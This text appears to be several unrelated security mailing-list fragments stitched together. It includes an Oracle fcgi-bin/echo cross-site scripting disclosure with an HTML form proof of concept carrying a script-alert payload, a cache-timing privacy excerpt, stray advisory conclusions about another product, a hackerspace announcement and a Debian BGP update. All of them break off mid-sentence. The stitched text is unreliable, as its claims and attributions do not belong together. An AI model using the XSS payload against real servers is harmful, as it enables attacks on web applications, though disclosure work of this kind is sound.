Long ago, I wrote about an XSS vulnerability in Oracle fcgi-bin/echo :
http://lists.grok.org.uk/pipermail/full-disclosure/2010-October/076794.html
http://www.securityfocus.com/archive/1/514181
The issue may now be fixed in the latest versions of Oracle web servers:
http://www.integrigy.com/oracle-security-blog/archive/2010/10/10/fastcgi-fcgi-bin-echo
So I now release the PoC for this vulnerability:
<form action="http://server/fcgi-bin/echo" method=post enctype="multipart/form-data">
<input type=text name=xss size=50 value="<script>alert('XSS')</script>"><br>
<input type=submit value="send">
http://lcamtuf.coredump.cx/cachetime/
In essence, in the past few years, browser vendors have severely
crippled CSS :visited selectors in order to prevent CSS-based history
snooping that made the headlines not long ago (see, for example,
http://wtikay.com). Although it's fairly obvious that other privacy
side channels, such as cache timing, theoretically disclose comparable
data, the attacks demonstrated so far offered, at best, vaguely
probabilistic results (say,
http://www.cs.princeton.edu/sip/pub/webtiming.pdf). On top of that,
-:: Solution ::-
Regular expression match and / or bad characters conversion rocks!
Conclusion:
Easy to install and use, but the code should have been reviewed long ago.
Reference:
http://forum.intern0t.net/intern0t-advisories/1122-intern0t-translucid-1-75-multiple-vulnerabilities.html
Disclosure Information:
with the subsequent creation of the Hacker Space Brussels[2], the
rapprochement with The Fiber in Amsterdam and the hackerspaces.org[3]
network. Initiatives of hackerspace openings in Grenoble or Lille, or
the upcoming FrHack[4] conference show an actual enthusiasm in the
French hackers community that was doomed to the "underground" not so
long ago. We salute these initiatives and their diversity!
Soon enough, we wanted to reiterate the HSF experience : however, it
was out of the question to institutionalize this temporary autonomous
zone, nor make it an ersatz of the previous edition, nor even to wrap
it into an "elite" or "underground" aura. On the opposite, we ardently
restricted to directly configured BGP peers.
This security update removes AS_PATHLIMIT processing from the BGP
implementation, preserving the configuration statements for backwards
compatibility. (Standardization of this BGP extension was abandoned
long ago.)
For the oldstable distribution (lenny), these problems have been fixed
in version 0.99.10-1lenny5.
For the stable distribution (squeeze), these problems have been fixed
